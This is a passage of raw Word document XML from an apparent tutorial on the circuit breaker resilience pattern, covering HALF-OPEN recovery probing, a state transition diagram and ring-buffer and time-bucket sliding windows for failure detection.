    <w:p w14:paraId="60C1FF5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>An internal </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>timer</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> starts when the circuit opens. After a configurable </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>open timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> (the "sleep window" — typically 30–60 seconds), the circuit transitions to HALF-OPEN to probe whether the downstream has recovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6DFBEF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HALF-OPEN State (Recovery Probing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F66CA4D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit is partially open — a controlled, limited number of requests are allowed through to test whether the downstream has recovered. This state is the circuit breaker's </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>recovery detection mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356BDAF1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Internally, the circuit allows exactly N test requests through (configurable — typically 1–10). All other requests continue to be rejected immediately (same as OPEN). The outcomes of the N test requests determine the next transition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BB29C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="958"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the test requests </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>succeed</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> → the downstream has recovered → transition to CLOSED. Resume normal traffic flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783E125A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="958"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the test requests </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fail</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> → the downstream is still failing → transition back to OPEN. Reset the open timeout timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0052F1D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The HALF-OPEN state is a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binary decision point</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — after N test requests complete, the circuit either recovers or re-opens. There is no gradual reopening in a basic circuit breaker (more sophisticated implementations add gradual traffic increase — discussed later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914BBB8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>State Transition Diagram — Complete Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7249EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AE745" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                    failure rate &gt; threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD73F6B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                    OR slow call rate &gt; threshold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A8E7A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         ┌─────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCBCE34" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                                         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B28752" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFE13F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    ┌─────────┐     open timeout expires      ┌──────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61505633" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    │  OPEN   │ ─────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>▶</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">HALF-OPEN </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6207C535" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    │         │                               │          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F25648F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    │ reject  │ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>◀</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> N test   </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388FA7C7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    │   all   │   test requests fail          │ requests │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24515C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    └─────────┘                               └──────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E522EFB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E13711" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                                         │ test requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A3F87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                                         │ succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C33C1F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │                                         </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3C7E4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         │            failure rate &gt; threshold ┌─────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E38360A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">         └──────────────────────────────────── │ CLOSED  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7E1106" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                               │         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785FE287" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                               │ pass    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11823C99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                               │   all   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B6E42" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">                                               └─────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1A80D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The asymmetry in transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B8DEE7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Opening the circuit (CLOSED → OPEN) requires sustained evidence of failure across a window of calls. This prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>false positives</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — a transient spike of errors doesn't immediately open the circuit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C1824" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Closing the circuit (HALF-OPEN → CLOSED) requires only N successful test requests. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fast recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — once the downstream is healthy, normal traffic resumes quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B46D6D9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Re-opening the circuit (HALF-OPEN → OPEN) requires only one failure (or a failure threshold among N test requests). This prevents </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>premature closure</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — a briefly recovered-then-failing service doesn't repeatedly cycle between HALF-OPEN and CLOSED, causing traffic to repeatedly reach the unstable service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AD1E65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="1CD1ED21">
          <v:rect id="_x0000_i4103" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3773E12F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. The Sliding Window — Statistical Failure Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73928F67" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>The circuit breaker's intelligence comes from how it accumulates and evaluates failure evidence. The window is the core data structure — it determines what "recent behavior" means and how quickly the circuit responds to changing conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58945F9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Count-Based Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2544AE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Records the last </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N calls</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> regardless of time. The window contains exactly N outcomes. Each new call evicts the oldest outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8B2F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal implementation — ring buffer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2586427D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A ring buffer of N slots, each containing a call outcome (SUCCESS, FAILURE, SLOW, or NOT_PERMITTED). A write pointer advances circularly. A new outcome overwrites the oldest entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB174F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E06950" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Ring buffer (N=10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60351680" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>[S, S, F, S, S, F, F, S, F, S]  ← write pointer wraps around</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAD10D4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve"> 0  1  2  3  4  5  6  7  8  9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6B772C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="7EC7AB06" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Aggregates maintained (updated on each write):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF8EF6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  total_calls: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05061852" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_count: 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DFAE98" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  slow_count: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139EEE4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  success_count: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268E42FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate: 40%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAD03E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When a new call outcome arrives (say, FAILURE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7AD2E0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Read the outcome at the current write position (say, position 0 = SUCCESS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8AE65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decrement</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> the aggregate for the evicted outcome (success_count--).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03473C6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> the new outcome at position 0 (FAILURE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE5CC15" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Increment</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> the aggregate for the new outcome (failure_count++).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D31B19" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Advance the write pointer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC353EB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="959"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Recompute failure_rate = failure_count / total_calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39771CF0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is O(1) per call update and O(1) for threshold evaluation — the aggregates are always current.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299DF05E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The count-based window's temporal blindness:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1AFD13" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If traffic is very low (1 call per hour), the window covers N calls = N hours. Failures from 8 hours ago are still in the window, keeping the circuit open even though the service may have recovered long ago. Conversely, if traffic surges (1000 calls per second), the window covers N/1000 seconds — a very short time window that may cause false trips on brief error spikes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456B7AD9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Count-based windows work best when call rates are relatively stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4754B278" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-Based Sliding Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174F850E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Records all calls within the last </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> regardless of count. Older calls are evicted as time passes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B02D4C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal implementation — circular array of time buckets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C693D3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Rather than storing individual call outcomes (too memory-intensive at high call rates), the window is divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>time buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — each bucket covers a fraction of the total window (e.g., total window = 10 seconds, 10 buckets of 1 second each):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21EFFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230019FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
